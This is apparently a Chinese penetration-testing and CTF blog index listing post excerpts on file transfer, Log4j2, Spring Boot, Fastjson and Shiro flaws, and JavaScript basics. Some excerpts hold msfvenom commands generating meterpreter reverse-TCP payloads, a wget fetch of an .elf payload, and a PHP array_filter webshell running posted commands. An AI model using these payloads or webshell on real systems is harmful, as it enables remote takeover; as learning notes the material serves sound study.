linux文件传输 生成payload首先我们得生成一个linux下的可执行文件.elf 1msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.79.138 lport=9999 -f elf -o linux_64_9999.elf wget下载指定的文件 12wget http://192.168.81.229/5555.elf -P /t 2024-01-22 #渗透
windows文件传输 BitsadminBITSAdmin 是一个命令行工具,可以使用它创建下载或上传作业,并监视其进度。 缺点不能下载python 开启的http服务,必须是真实的http 服务 现在尝试使用 生成payload1msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.81.238 lport=6666 -f hta-psh &g 2024-01-22 #渗透
php_exec array_filter12345678910<?php $cmd=$_POST['cmd'];$array1=array($cmd);$func =$_GET['func'];array_filter($array1,$func);//用回调函数过滤数组中的元素:array_filter(数组,函数)//?func=system//cmd=whoam 2024-01-22 #靶场记录
smart ssti [CISCN 2019华东南]Web110x00 关键点 xff + Smarty 0x01 根据提示使用 发现执行了, 0x02 代码执行system() 发现并没有存在 看源码 2024-01-21 #CTF刷题记录
Log4j2 简介Apache log4j 是Apache 的一个开源项目, Apache log4j2 是一个Java 的日志记录工具。该工具重写了log4j 框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。 漏洞简介log4j2 中存在JNDI 注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。 2024-01-20 #渗透
SpringBoot 简介SpringBoot简绍 Spring是java web里非常常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring BootActuators反序列化 Actuator简绍 Spring Boot 是 Spring 框架的扩展。Actuator 是 Springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator,开发者可以很方便地对应用系统的某些监 2024-01-20 #渗透
FastJson漏洞 简介 Fastjson是阿里巴巴公司开源的一款JSON解析器,它可以解析 JSON 格式的字符串,是一个 Java 库, 支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 Java Bean。可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使 2024-01-18 #渗透
Shiro漏洞 简介Apache Shiro是一种功能强大且易于使用的Java安全框架,它执行身份验证、授权、加密和会话管理,可用于保护任何应用程序的安全。 Shiro提供了应用程序安全性API来执行以下方面: 身份验证:证明用户身份,通常称为用户”登录” 授权:访问控制 密码术:保护或隐藏数据以防窥视 会话管理:每个用户的时间敏感状态 上述四个方面也被称为应用程序安全性的四个基石。 关于这个漏洞 2024-01-18 #渗透
JavaScript 导入方式 通过 中进行编写 可以在head 部分,也可以在body 部分 通过script 标签中src 进行引入 简单的变量和函数基本和c 一直 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849<!DOCTYPE html><html lang 2024-01-17 #前端